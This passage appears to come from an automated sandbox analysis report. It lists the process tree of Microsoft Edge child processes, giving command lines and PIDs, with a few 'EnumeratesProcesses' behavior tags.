  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1
  2⤵
  PID:1876
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5060 /prefetch:1
  2⤵
  PID:1108
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5064 /prefetch:1
  2⤵
  PID:128
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3724 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4132
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4428 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2136
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5184 /prefetch:1
  2⤵
  PID:4372
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5312 /prefetch:8
  2⤵
  PID:732
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5000 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4672
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5420 /prefetch:1
  2⤵
  PID:4992
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5548 /prefetch:1
  2⤵
  PID:3264
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5428 /prefetch:1
  2⤵
  PID:5284
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5284 /prefetch:1
  2⤵
  PID:3548
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3852 /prefetch:1
  2⤵
  PID:5512
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5760 /prefetch:1
  2⤵
  PID:2164
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=4012 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:236
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4160 /prefetch:1
  2⤵
  PID:4180
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6068 /prefetch:1
  2⤵
  PID:5516
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5944 /prefetch:1
  2⤵
  PID:5716
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5452 /prefetch:1
  2⤵
  PID:4392
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6740 /prefetch:1
  2⤵
  PID:4896
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6780 /prefetch:1
  2⤵
  PID:3352
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6588 /prefetch:1
  2⤵
  PID:5132
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6652 /prefetch:1
  2⤵
  PID:3832
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6984 /prefetch:1
  2⤵
  PID:4316
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7008 /prefetch:1
  2⤵
  PID:2084
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6920 /prefetch:1
  2⤵
  PID:3388
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7348 /prefetch:1
  2⤵
  PID:5296
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7496 /prefetch:1
  2⤵
  PID:5212
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7628 /prefetch:1
  2⤵
  PID:128
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7164 /prefetch:1
  2⤵
  PID:2680
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7820 /prefetch:1
  2⤵
  PID:2096
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7160 /prefetch:1
  2⤵
  PID:3432
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2708 /prefetch:1
  2⤵
  PID:3296
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6592 /prefetch:1
  2⤵
  PID:3592
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5760 /prefetch:1
  2⤵
  PID:2916
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8236 /prefetch:1
  2⤵
  PID:4872
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8548 /prefetch:1
  2⤵
  PID:1120
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8952 /prefetch:1
  2⤵
  PID:2200
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8972 /prefetch:1
  2⤵
  PID:1404
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9296 /prefetch:1
  2⤵
  PID:3908
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8840 /prefetch:1
  2⤵
  PID:420
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8684 /prefetch:1
  2⤵
  PID:2804
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9640 /prefetch:1
  2⤵
  PID:6132
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9228 /prefetch:1
  2⤵
  PID:4140
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9632 /prefetch:1
  2⤵
  PID:4424
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6868 /prefetch:1
  2⤵
  PID:2520
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6816 /prefetch:1
  2⤵
  PID:5056
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9120 /prefetch:1
  2⤵
  PID:5188
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7328 /prefetch:1
  2⤵
  PID:4360
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5208 /prefetch:1
  2⤵
  PID:3308
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9436 /prefetch:1
  2⤵
  PID:6076
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9508 /prefetch:1
  2⤵
  PID:4116
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8888 /prefetch:1
  2⤵
  PID:3000
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8612 /prefetch:1
  2⤵
  PID:5104
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7416 /prefetch:1
  2⤵
  PID:4548
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8856 /prefetch:1
  2⤵
  PID:5252
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7764 /prefetch:1
  2⤵
  PID:792
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8236 /prefetch:1
  2⤵
  PID:912
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9776 /prefetch:1
  2⤵
  PID:776
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9520 /prefetch:1
  2⤵
  PID:4116
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9760 /prefetch:1
  2⤵
  PID:4980
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9296 /prefetch:1
  2⤵
  PID:2684
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9516 /prefetch:1
  2⤵
  PID:420
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6484 /prefetch:1
  2⤵
  PID:4880
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,17464739700193146239,13985129463235285345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9448 /prefetch:1
  2⤵
  PID:416
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
